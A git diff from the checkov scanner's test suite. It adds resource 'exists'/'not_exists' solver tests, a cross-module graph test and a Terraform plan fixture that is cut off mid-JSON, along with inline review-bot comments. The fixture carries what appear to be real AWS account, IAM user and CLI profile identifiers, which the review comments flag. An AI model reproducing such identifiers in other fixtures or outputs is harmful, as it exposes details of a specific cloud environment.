+ root_folder = 'resources' + check_id = "JsonPathRangeNotIncludesList" + should_fail = ['test.pass1', 'test.pass2', 'test.pass3', 'test.pass4', 'test.pass5', 'test.pass6', 'test.pass7'] should_pass = ['test.fail1', 'test.fail2', 'test.fail3', 'test.fail4', 'test.fail5', 'test.fail6', 'test.fail7', - 'test.fail8'] + 'test.fail8', 'test.fail9'] expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}} self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id) 
diff --git a/checkov/sca_package/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/__init__.py
similarity index 100%
rename from checkov/sca_package/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml
new file mode 100644
index 00000000000..774200c0c52
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/ResourceAllowList.yaml
@@ -0,0 +1,11 @@
+metadata:
+ name: "example"
+ category: "GENERAL_SECURITY"
+ id: "ResourceAllowList"
+scope:
+ provider: "AWS"
+definition:
+ cond_type: "resource"
+ resource_types:
+ - "aws_s3_bucket"
+ operator: "exists"
diff --git a/tests/azure_pipelines/image_referencer/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/__init__.py
similarity index 100%
rename from tests/azure_pipelines/image_referencer/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/exists_solver/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py
new file mode 100644
index 00000000000..34f637e9314
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/exists_solver/test_solver.py
@@ -0,0 +1,33 @@
+from pathlib import Path
+
+from parameterized import parameterized_class
+
+from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
+
+TEST_DIRNAME = Path(__file__).parent
+
+
+@parameterized_class([{"graph_framework": "NETWORKX"}, {"graph_framework": "IGRAPH"}])
+class ExistsSolver(TestBaseSolver):
+ def setUp(self):
+ self.checks_dir = str(TEST_DIRNAME)
+ super().setUp()
+
+ def test_allow_list(self):
+ # given
+ root_folder = TEST_DIRNAME.parents[2] / "resources/encryption_test"
+ check_id = "ResourceAllowList"
+ should_pass = [
+ "aws_s3_bucket.encrypted_bucket",
+ "aws_s3_bucket.unencrypted_bucket",
+ ]
+ should_fail = [
+ "aws_rds_cluster.rds_cluster_encrypted",
+ "aws_rds_cluster.rds_cluster_unencrypted",
+ "aws_neptune_cluster.encrypted_neptune",
+ "aws_neptune_cluster.unencrypted_neptune",
+ ]
+ expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+ # when/then
+ self.run_test(root_folder=str(root_folder), expected_results=expected_results, check_id=check_id)
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml
new file mode 100644
index 00000000000..fa5101eae62
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/ResourceDenyList.yaml
@@ -0,0 +1,11 @@
+metadata:
+ name: "example"
+ category: "GENERAL_SECURITY"
+ id: "ResourceDenyList"
+scope:
+ provider: "AWS"
+definition:
+ cond_type: "resource"
+ resource_types:
+ - "aws_s3_bucket"
+ operator: "not_exists"
diff --git a/tests/circleci_pipelines/image_referencer/__init__.py b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/__init__.py
similarity index 100%
rename from tests/circleci_pipelines/image_referencer/__init__.py
rename to tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/__init__.py
diff --git a/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py
new file mode 100644
index 00000000000..565cc1a1a03
--- /dev/null
+++ b/tests/terraform/graph/checks_infra/resource_solvers/not_exists_solver/test_solver.py
@@ -0,0 +1,33 @@
+from pathlib import Path
+
+from parameterized import parameterized_class
+
+from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
+
+TEST_DIRNAME = Path(__file__).parent
+
+
+@parameterized_class([{"graph_framework": "NETWORKX"}, {"graph_framework": "IGRAPH"}])
+class NotExistsSolver(TestBaseSolver):
+ def setUp(self):
+ self.checks_dir = str(TEST_DIRNAME)
+ super().setUp()
+
+ def test_deny_list(self):
+ # given
+ root_folder = TEST_DIRNAME.parents[2] / "resources/encryption_test"
+ check_id = "ResourceDenyList"
+ should_pass = [
+ "aws_rds_cluster.rds_cluster_encrypted",
+ "aws_rds_cluster.rds_cluster_unencrypted",
+ "aws_neptune_cluster.encrypted_neptune",
+ "aws_neptune_cluster.unencrypted_neptune",
+ ]
+ should_fail = [
+ "aws_s3_bucket.encrypted_bucket",
+ "aws_s3_bucket.unencrypted_bucket",
+ ]
+ expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}
+
+ # when/then
+ self.run_test(root_folder=str(root_folder), expected_results=expected_results, check_id=check_id)
diff --git a/tests/terraform/graph/graph_builder/test_graph_builder.py b/tests/terraform/graph/graph_builder/test_graph_builder.py
index f5dd975d485..70f30e6a916 100644
--- a/tests/terraform/graph/graph_builder/test_graph_builder.py
+++ b/tests/terraform/graph/graph_builder/test_graph_builder.py
@@ -9,6 +9,7 @@ from checkov.terraform.graph_manager import TerraformGraphManager from checkov.common.graph.graph_builder import CustomAttributes from checkov.terraform.modules.module_utils import external_modules_download_path +from checkov.terraform.plan_utils import create_definitions TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__)) @@ -372,6 +373,13 @@ def test_build_rustworkx_graph(self): self.check_edge(graph, resource_node, var_region_node, 'region') self.check_edge(graph, provider_node, var_aws_profile_node, 'profile') self.check_edge(graph, local_node, var_bucket_name_node, 'bucket_name') + + def test_multiple_modules_with_connected_resources(self): + valid_plan_path = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules_edges_tfplan/tfplan.json')) + definitions, definitions_raw = create_definitions(root_folder=None, files=[valid_plan_path]) + graph_manager = TerraformGraphManager(db_connector=RustworkxConnector()) + tf_plan_local_graph = graph_manager.build_graph_from_definitions(definitions, render_variables=False) + self.assertTrue(tf_plan_local_graph.in_edges[2]) def build_new_key_for_tf_definition(key): diff --git a/tests/terraform/graph/graph_builder/test_local_graph.py b/tests/terraform/graph/graph_builder/test_local_graph.py index b6463f1be98..9abb9fa7fd7 100644 --- a/tests/terraform/graph/graph_builder/test_local_graph.py +++ b/tests/terraform/graph/graph_builder/test_local_graph.py @@ -434,4 +434,3 @@ def test_variables_same_name_different_modules(self): # Check they point to 2 different modules self.assertEqual(2, len(module_variable_edges)) self.assertNotEqual(local_graph.vertices[module_variable_edges[0].origin], local_graph.vertices[module_variable_edges[1].origin]) - diff --git a/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf b/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf new file mode 100644 index 00000000000..e29f6e181fc --- /dev/null 
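Review bot: `self.assertTrue(tf_plan_local_graph.in_edges[2])` in `test_multiple_modules_with_connected_resources` only checks that whatever sits at slot 2 of `in_edges` is truthy, so it passes for any graph with an inbound edge there and does not verify the cross-module behaviour the test name promises. The fixture gives each module an `aws_s3_bucket_public_access_block.this[0]` whose `bucket` references its own `aws_s3_bucket.this[0].id`, so I would resolve those four vertices by name and assert that each public-access block is linked to the bucket of the same module and not to the other module's, or at least pin the edge count, e.g. `self.assertEqual(2, len(tf_plan_local_graph.edges))` if two is the expected number; the `in_edges`/`edges` layout is inferred from usage here, so confirm it against the local graph class. `definitions_raw` is assigned and never used; `definitions, _ = create_definitions(root_folder=None, files=[valid_plan_path])` makes that explicit. The enclosing test class starts outside the hunk.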
+++ b/tests/terraform/graph/resources/modules_edges_tfplan/s3module.tf
@@ -0,0 +1,9 @@
+module "s3-bucket-1" {
+ source = "terraform-aws-modules/s3-bucket/aws"
+ version = "4.0.1"
+}
+
+module "s3-bucket-2" {
+ source = "terraform-aws-modules/s3-bucket/aws"
+ version = "4.0.1"
+}
\ No newline at end of file
diff --git a/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json b/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json
new file mode 100644
index 00000000000..4db9d4c8a9f
--- /dev/null
+++ b/tests/terraform/graph/resources/modules_edges_tfplan/tfplan.json
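Review bot: The plan fixture generated from this module file (tfplan.json, added alongside it) appears to have been captured against a real environment and carries that environment's identifiers — an AWS account id, an IAM user ARN and user id under `prior_state`, and a named CLI profile under `provider_config`; a committed test fixture should not embed account-specific data, so regenerate the plan with placeholder values (or scrub those fields by hand) and record that here, e.g. `# Source for tfplan.json; regenerate with scrubbed account/profile values before committing`. The file also lacks a trailing newline (`\ No newline at end of file`), which most formatters and pre-commit hooks will flag.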
@@ -0,0 +1,4123 @@ +{ + "format_version": "0.2", + "terraform_version": "1.0.7", + "planned_values": { + "root_module": { + "child_modules": [ + { + "resources": [ + { + "address": "module.s3-bucket-1.aws_s3_bucket.this[0]", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "sensitive_values": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + }, + { + "address": "module.s3-bucket-1.aws_s3_bucket_public_access_block.this[0]", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket-1" + }, + { + "resources": [ + { + "address": "module.s3-bucket-2.aws_s3_bucket.this[0]", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "sensitive_values": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + }, + { + "address": "module.s3-bucket-2.aws_s3_bucket_public_access_block.this[0]", + "mode": "managed", + "type": 
"aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket-2" + } + ] + } + }, + "resource_changes": [ + { + "address": "module.s3-bucket-1.aws_s3_bucket.this[0]", + "module_address": "module.s3-bucket-1", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "after_unknown": { + "acceleration_status": true, + "acl": true, + "arn": true, + "bucket": true, + "bucket_domain_name": true, + "bucket_prefix": true, + "bucket_regional_domain_name": true, + "cors_rule": true, + "grant": true, + "hosted_zone_id": true, + "id": true, + "lifecycle_rule": true, + "logging": true, + "object_lock_configuration": true, + "policy": true, + "region": true, + "replication_configuration": true, + "request_payer": true, + "server_side_encryption_configuration": true, + "tags_all": true, + "versioning": true, + "website": true, + "website_domain": true, + "website_endpoint": true + }, + "before_sensitive": false, + "after_sensitive": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + } + }, + { + "address": "module.s3-bucket-1.aws_s3_bucket_public_access_block.this[0]", + "module_address": "module.s3-bucket-1", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": 
"registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "after_unknown": { + "bucket": true, + "id": true + }, + "before_sensitive": false, + "after_sensitive": {} + } + }, + { + "address": "module.s3-bucket-2.aws_s3_bucket.this[0]", + "module_address": "module.s3-bucket-2", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "after_unknown": { + "acceleration_status": true, + "acl": true, + "arn": true, + "bucket": true, + "bucket_domain_name": true, + "bucket_prefix": true, + "bucket_regional_domain_name": true, + "cors_rule": true, + "grant": true, + "hosted_zone_id": true, + "id": true, + "lifecycle_rule": true, + "logging": true, + "object_lock_configuration": true, + "policy": true, + "region": true, + "replication_configuration": true, + "request_payer": true, + "server_side_encryption_configuration": true, + "tags_all": true, + "versioning": true, + "website": true, + "website_domain": true, + "website_endpoint": true + }, + "before_sensitive": false, + "after_sensitive": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + } + }, + { + "address": "module.s3-bucket-2.aws_s3_bucket_public_access_block.this[0]", + "module_address": "module.s3-bucket-2", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": 
{ + "actions": [ + "create" + ], + "before": null, + "after": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "after_unknown": { + "bucket": true, + "id": true + }, + "before_sensitive": false, + "after_sensitive": {} + } + } + ], + "prior_state": { + "format_version": "0.2", + "terraform_version": "1.0.7", + "values": { + "root_module": { + "child_modules": [ + { + "resources": [ + { + "address": "module.s3-bucket-1.data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "account_id": "101860328116", + "arn": "arn:aws:iam::101860328116:user/atlantis", + "id": "101860328116", + "user_id": "AIDARPN2ZIK2PHMJSNYXG" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket-1.data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "dns_suffix": "amazonaws.com", + "id": "aws", + "partition": "aws", + "reverse_dns_prefix": "com.amazonaws" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket-1.data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": "Europe (Frankfurt)", + "endpoint": "ec2.eu-central-1.amazonaws.com", + "id": "eu-central-1", + "name": "eu-central-1" + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket-1" + }, + { + "resources": [ + { + "address": "module.s3-bucket-2.data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "account_id": "101860328116", + "arn": 
"arn:aws:iam::101860328116:user/atlantis", + "id": "101860328116", + "user_id": "AIDARPN2ZIK2PHMJSNYXG" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket-2.data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "dns_suffix": "amazonaws.com", + "id": "aws", + "partition": "aws", + "reverse_dns_prefix": "com.amazonaws" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket-2.data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": "Europe (Frankfurt)", + "endpoint": "ec2.eu-central-1.amazonaws.com", + "id": "eu-central-1", + "name": "eu-central-1" + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket-2" + } + ] + } + } + }, + "configuration": { + "provider_config": { + "aws": { + "name": "aws", + "expressions": { + "profile": { + "constant_value": "razorpay-stage" + }, + "region": { + "constant_value": "eu-central-1" + } + } + }, + "module.s3-bucket-1:aws": { + "name": "aws", + "version_constraint": ">= 5.27.0", + "module_address": "module.s3-bucket-1" + }, + "module.s3-bucket-2:aws": { + "name": "aws", + "version_constraint": ">= 5.27.0", + "module_address": "module.s3-bucket-2" + } + }, + "root_module": { + "module_calls": { + "s3-bucket-1": { + "source": "terraform-aws-modules/s3-bucket/aws", + "module": { + "outputs": { + "s3_bucket_arn": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname." 
+ }, + "s3_bucket_bucket_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com." + }, + "s3_bucket_bucket_regional_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_regional_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL." + }, + "s3_bucket_hosted_zone_id": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].hosted_zone_id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The Route 53 Hosted Zone ID for this bucket's region." + }, + "s3_bucket_id": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The name of the bucket." + }, + "s3_bucket_lifecycle_configuration_rules": { + "expression": { + "references": [ + "aws_s3_bucket_lifecycle_configuration.this[0].rule", + "aws_s3_bucket_lifecycle_configuration.this[0]", + "aws_s3_bucket_lifecycle_configuration.this" + ] + }, + "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string." + }, + "s3_bucket_policy": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].policy", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this" + ] + }, + "description": "The policy of the bucket, if the bucket is configured with a policy. 
If not, this will be an empty string." + }, + "s3_bucket_region": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].region", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The AWS region this bucket resides in." + }, + "s3_bucket_website_domain": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_domain", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. This is used to create Route 53 alias records." + }, + "s3_bucket_website_endpoint": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_endpoint", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string." 
+ } + }, + "resources": [ + { + "address": "aws_s3_bucket.this", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "var.bucket" + ] + }, + "bucket_prefix": { + "references": [ + "var.bucket_prefix" + ] + }, + "force_destroy": { + "references": [ + "var.force_destroy" + ] + }, + "object_lock_enabled": { + "references": [ + "var.object_lock_enabled" + ] + }, + "tags": { + "references": [ + "var.tags" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_accelerate_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_accelerate_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "status": { + "references": [ + "var.acceleration_status" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.acceleration_status" + ] + } + }, + { + "address": "aws_s3_bucket_acl.this", + "mode": "managed", + "type": "aws_s3_bucket_acl", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "acl": { + "references": [ + "var.acl", + "var.acl" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl" + ] + }, + "depends_on": [ + "aws_s3_bucket_ownership_controls.this" + ] + }, + { + "address": "aws_s3_bucket_analytics_configuration.this", + "mode": "managed", + "type": 
"aws_s3_bucket_analytics_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.analytics_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_cors_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_cors_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.cors_rules" + ] + } + }, + { + "address": "aws_s3_bucket_intelligent_tiering_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_intelligent_tiering_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "status": { + "references": [ + "each.value.status", + "each.value", + "each.value.status", + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "local.intelligent_tiering", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_inventory.this", + "mode": "managed", + "type": "aws_s3_bucket_inventory", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "each.value.bucket", + "each.value", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + 
"destination": [ + { + "bucket": [ + { + "account_id": { + "references": [ + "each.value.destination.account_id", + "each.value.destination", + "each.value" + ] + }, + "bucket_arn": { + "references": [ + "each.value.destination.bucket_arn", + "each.value.destination", + "each.value", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "format": { + "references": [ + "each.value.destination.format", + "each.value.destination", + "each.value" + ] + }, + "prefix": { + "references": [ + "each.value.destination.prefix", + "each.value.destination", + "each.value" + ] + } + } + ] + } + ], + "enabled": { + "references": [ + "each.value.enabled", + "each.value" + ] + }, + "included_object_versions": { + "references": [ + "each.value.included_object_versions", + "each.value" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "optional_fields": { + "references": [ + "each.value.optional_fields", + "each.value" + ] + }, + "schedule": [ + { + "frequency": { + "references": [ + "each.value.frequency", + "each.value" + ] + } + } + ] + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.inventory_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.lifecycle_rules" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": "aws_s3_bucket_logging.this", + "mode": "managed", + "type": "aws_s3_bucket_logging", + "name": "this", + "provider_config_key": 
"s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "target_bucket": { + "references": [ + "var.logging[\"target_bucket\"]", + "var.logging" + ] + }, + "target_prefix": { + "references": [ + "var.logging[\"target_prefix\"]", + "var.logging" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.logging" + ] + } + }, + { + "address": "aws_s3_bucket_metric.this", + "mode": "managed", + "type": "aws_s3_bucket_metric", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.value.name", + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "local.metric_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_object_lock_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_object_lock_configuration", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "rule": [ + { + "default_retention": [ + { + "days": { + "references": [ + "var.object_lock_configuration.rule.default_retention.days", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "mode": { + "references": [ + "var.object_lock_configuration.rule.default_retention.mode", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "years": { + "references": [ + 
"var.object_lock_configuration.rule.default_retention.years", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + } + ] + } + ], + "token": { + "references": [ + "var.object_lock_configuration.token", + "var.object_lock_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.object_lock_enabled", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_ownership_controls.this", + "mode": "managed", + "type": "aws_s3_bucket_ownership_controls", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "local.attach_policy", + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "rule": [ + { + "object_ownership": { + "references": [ + "var.object_ownership" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.control_object_ownership" + ] + }, + "depends_on": [ + "aws_s3_bucket_policy.this", + "aws_s3_bucket_public_access_block.this", + "aws_s3_bucket.this" + ] + }, + { + "address": "aws_s3_bucket_policy.this", + "mode": "managed", + "type": "aws_s3_bucket_policy", + "name": "this", + "provider_config_key": "s3-bucket-1:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "policy": { + "references": [ + "data.aws_iam_policy_document.combined[0].json", + "data.aws_iam_policy_document.combined[0]", + "data.aws_iam_policy_document.combined" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + 
